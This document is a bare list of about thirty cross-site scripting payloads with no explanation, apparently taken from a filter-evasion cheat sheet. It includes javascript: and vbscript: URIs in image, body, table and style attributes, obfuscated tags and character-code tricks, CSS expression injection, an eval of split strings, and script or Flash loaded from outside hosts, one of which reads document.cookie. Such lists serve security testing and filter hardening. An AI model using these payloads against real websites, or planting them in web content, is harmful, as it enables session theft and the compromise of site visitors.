<IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"> <IMG SRC="jav ascript:alert('XSS');"> <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <iframe src=http://example.com/scriptlet.html < <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert(document.cookie)> <BODY onload!#$%&()*~+-_.,:;?@[/|"]^`=alert("XSS")> <IMG DYNSRC="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <BR SIZE="&{alert('XSS')}"> <IMG SRC='vbscript:msgbox("XSS")'> <TABLE BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="width: expression(alert('XSS'));"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <A HREF="javascript:document.location='http://www.example.com/'">XSS</A> <IMG SRC=javascript:alert('XSS')> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL("""; c="javascript:"; d="alert('XSS');"")"; eval(a+b+c+d); |